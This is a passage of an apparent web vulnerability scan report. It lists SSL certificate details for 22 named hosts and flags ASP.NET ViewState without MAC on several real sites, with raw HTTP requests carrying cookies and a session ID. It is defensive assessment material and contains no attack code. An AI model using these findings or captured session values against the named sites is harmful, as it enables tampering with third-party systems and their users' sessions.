<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l#v" >Freelance Logo Design Service</a>
...[SNIP]...
<li><a href="/legal/privacy-policy.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >Privacy Policy</a>
...[SNIP]...
<li><a href="http://www.networksolutions.com/support/domain-deletion-policy/;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" target="_new" >Domain Deletion Policy</a>
...[SNIP]...
<li><a href="http://www.networksolutions.com/support/domain-transfer-policy/;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" target="_new" >Domain Transfer Policy</a>
...[SNIP]...
<li><a href="/legal/aup.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >Acceptable Use Policy</a>
...[SNIP]...
<li><a href="/legal/SSL-legal-repository-sa.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >Subscriber Agreements</a>
...[SNIP]...
<li><a href="/legal/SSL-legal-repository-rpa.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >Relying Party Agreements</a>
...[SNIP]...
<li><a href="/legal/SSL-legal-repository-rpg.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >Relying Party Guarantee</a>
...[SNIP]...
<li><a href="/legal/SSL-legal-repository-cps.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >Certification Practice Statement</a>
...[SNIP]...
<li><a href="/legal/SSL-legal-repository-ev-sa.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >EV Subscriber Agreements</a>
...[SNIP]...
<li><a href="/legal/SSL-legal-repository-ev-cps.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >EV Certification Practice Statement</a>
...[SNIP]...
<li><a href="/legal/privacy-policy.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" rel="nofollow" >Privacy Policy</a>
...[SNIP]...
<li><a href="/legal/legal-notice.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" rel="nofollow" >Terms of Use</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" rel="nofollow" >Legal &amp; Policies</a>
...[SNIP]...
<li><a href="/site-map/index.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >Site Map</a></li><li class="last"><a href="/help/email.jsp;jsessionid=806e2d4caa6cc054763194e76a0a:8y5l" >Contact Us</a>
...[SNIP]...
14. SSL certificate  previous  next
There are 22 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

14.1. https://secure.opinionlab.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.opinionlab.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Jun 15 19:00:00 CDT 2009
Valid to:  Mon Jul 11 18:59:59 CDT 2011

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019
14.2. https://www.clone-systems.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  www.clone-systems.com
Issued by:  Network Solutions EV SSL CA
Valid from:  Tue Aug 24 19:00:00 CDT 2010
Valid to:  Sat Aug 25 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Network Solutions EV SSL CA
Issued by:  Network Solutions Certificate Authority
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Tue Dec 31 17:59:59 CST 2019
14.3. https://broker.gotoassist.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://broker.gotoassist.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  broker.gotoassist.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Thu Jun 10 19:00:00 CDT 2010
Valid to:  Thu Jun 30 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
14.4. https://events.gsmiweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  events.gsmiweb.com
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Sun Nov 21 18:00:00 CST 2010
Valid to:  Sun Nov 22 17:59:59 CST 2015

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020
14.5. https://mosaicsecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mosaicsecurity.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  mosaicsecurity.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Fri Nov 12 21:28:44 CST 2010
Valid to:  Sat Nov 12 21:28:44 CST 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019
14.6. https://portal.lbmc.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal.lbmc.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  portal.lbmc.net
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Wed Jul 23 12:13:08 CDT 2008
Valid to:  Tue Oct 04 16:04:27 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019
14.7. https://seal.networksolutions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seal.networksolutions.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  seal.networksolutions.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Tue Jan 05 18:00:00 CST 2010
Valid to:  Wed Jan 22 17:59:59 CST 2014

Certificate chain #1

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 19:00:00 CDT 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #4

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020
14.8. https://seals.networksolutions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seals.networksolutions.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  seals.networksolutions.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Tue Feb 05 18:00:00 CST 2008
Valid to:  Sun Feb 26 17:59:59 CST 2012

Certificate chain #1

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 19:00:00 CDT 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020
14.9. https://secure.trust-guard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.trust-guard.com
Issued by:  Equifax Secure Global eBusiness CA-1
Valid from:  Thu Oct 23 09:21:27 CDT 2008
Valid to:  Tue Oct 23 09:21:27 CDT 2012

Certificate chain #1

Issued to:  Equifax Secure Global eBusiness CA-1
Issued by:  Equifax Secure Global eBusiness CA-1
Valid from:  Sun Jun 20 23:00:00 CDT 1999
Valid to:  Sat Jun 20 23:00:00 CDT 2020
14.10. https://ssl.google-analytics.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl.google-analytics.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google-analytics.com
Issued by:  Google Internet Authority
Valid from:  Wed Apr 13 04:15:13 CDT 2011
Valid to:  Fri Apr 13 04:25:13 CDT 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 15:43:27 CDT 2009
Valid to:  Fri Jun 07 14:43:27 CDT 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018
14.11. https://subscribe.haymarketmedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  subscribe.haymarketmedia.com
Issued by:  Trusted Secure Certificate Authority
Valid from:  Mon Jun 21 19:00:00 CDT 2010
Valid to:  Thu Jun 21 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Trusted Secure Certificate Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Thu Jun 28 13:14:35 CDT 2007
Valid to:  Sun Oct 28 13:44:35 CDT 2012

Certificate chain #2

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019
14.12. https://support.trust-guard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  support.trust-guard.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Tue Feb 02 05:30:20 CST 2010
Valid to:  Mon Feb 02 18:24:48 CST 2015

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018
14.13. https://verify.authorize.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://verify.authorize.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.authorize.net
Issued by:  Entrust Certification Authority - L1C
Valid from:  Wed Mar 31 12:04:00 CDT 2010
Valid to:  Fri Mar 30 12:33:57 CDT 2012

Certificate chain #1

Issued to:  Entrust Certification Authority - L1C
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Thu Dec 10 14:43:54 CST 2009
Valid to:  Tue Dec 10 15:13:54 CST 2019

Certificate chain #2

Issued to:  Entrust.net Certification Authority (2048)
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Fri Dec 24 11:50:51 CST 1999
Valid to:  Tue Jul 24 09:15:12 CDT 2029
14.14. https://www.expedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.expedia.com,ST=WASHINGTON
Issued by:  Akamai Subordinate CA 3
Valid from:  Sun Apr 10 17:54:27 CDT 2011
Valid to:  Tue Apr 10 17:54:27 CDT 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018
14.15. https://www.fiddler2.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fiddler2.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.fiddler2.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Oct 02 14:41:36 CDT 2008
Valid to:  Sun Oct 02 14:41:36 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034
14.16. https://www.gofileroom.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gofileroom.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.gofileroom.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sun May 23 22:49:01 CDT 2010
Valid to:  Sat Aug 25 10:25:42 CDT 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018
14.17. https://www.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.google.com
Issued by:  Thawte SGC CA
Valid from:  Thu Dec 17 18:00:00 CST 2009
Valid to:  Sun Dec 18 17:59:59 CST 2011

Certificate chain #1

Issued to:  Thawte SGC CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed May 12 19:00:00 CDT 2004
Valid to:  Mon May 12 18:59:59 CDT 2014

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
14.18. https://www.mavitunasecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mavitunasecurity.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.mavitunasecurity.com
Issued by:  Starfield Secure Certification Authority
Valid from:  Sat Aug 21 10:02:55 CDT 2010
Valid to:  Sun Aug 26 05:09:38 CDT 2012

Certificate chain #1

Issued to:  Starfield Secure Certification Authority
Issued by:  Starfield Class 2 Certification Authority
Valid from:  Wed Nov 15 19:15:40 CST 2006
Valid to:  Sun Nov 15 19:15:40 CST 2026

Certificate chain #2

Issued to:  Starfield Class 2 Certification Authority
Issued by:  Starfield Class 2 Certification Authority
Valid from:  Tue Jun 29 12:39:16 CDT 2004
Valid to:  Thu Jun 29 12:39:16 CDT 2034
14.19. https://www.paypal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.paypal.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Tue Mar 22 19:00:00 CDT 2011
Valid to:  Mon Apr 01 18:59:59 CDT 2013

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
14.20. https://www.taxnotebook.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.taxnotebook.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.taxnotebook.com
Issued by:  Entrust Certification Authority - L1B
Valid from:  Thu Sep 24 16:53:55 CDT 2009
Valid to:  Fri Sep 30 17:23:38 CDT 2011

Certificate chain #1

Issued to:  Entrust Certification Authority - L1B
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Mon Aug 25 13:14:26 CDT 2008
Valid to:  Sat Aug 25 13:44:26 CDT 2018

Certificate chain #2

Issued to:  Entrust.net Certification Authority (2048)
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Fri Dec 24 11:50:51 CST 1999
Valid to:  Tue Jul 24 09:15:12 CDT 2029
14.21. https://www.trpc401k.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trpc401k.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.trpc401k.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Sat Feb 12 09:53:25 CST 2011
Valid to:  Wed Feb 12 09:53:25 CST 2014

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019
14.22. https://www.trust-guard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trust-guard.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.trust-guard.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Wed Apr 21 09:33:31 CDT 2010
Valid to:  Sun Apr 21 09:33:31 CDT 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019
15. ASP.NET ViewState without MAC enabled  previous  next
There are 15 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

15.1. http://nba.scout.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nba.scout.com
Path:   /

Request

GET / HTTP/1.1
Host: nba.scout.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.2.9.1304728228796

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:30:41 GMT
Content-Type: text/html
Content-Location: http://nba.scout.com/StaticPages/nba/index.html
Last-Modified: Fri, 06 May 2011 17:43:32 GMT
Accept-Ranges: bytes
ETag: "ec70541e15ccc1:68c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Pike
Vary: Accept-Encoding
Content-Length: 25838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>NBA Team Directory Front Page</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...
15.2. http://recruiting.scout.com/Legacy/a.z  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /Legacy/a.z

Request

GET /Legacy/a.z?s=143&p=26&cfg=22&fromprefetch=1 HTTP/1.1
Host: recruiting.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utmz=153805115.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=153805115.1232119317.1303509265.1303509265.1303516031.2; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304731683.1304736111.6; __utmc=202704078; __utmb=202704078.1.10.1304736111

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 21:42:14 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 21:52:13 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 12091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...
15.3. https://subscribe.haymarketmedia.com/scm/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /scm/

Request

GET /scm/?form= HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=y3mspj55lrmqru55pqpftdmj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:49:16 GMT
Content-Length: 5394


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link href="Pubs/SC
...[SNIP]...
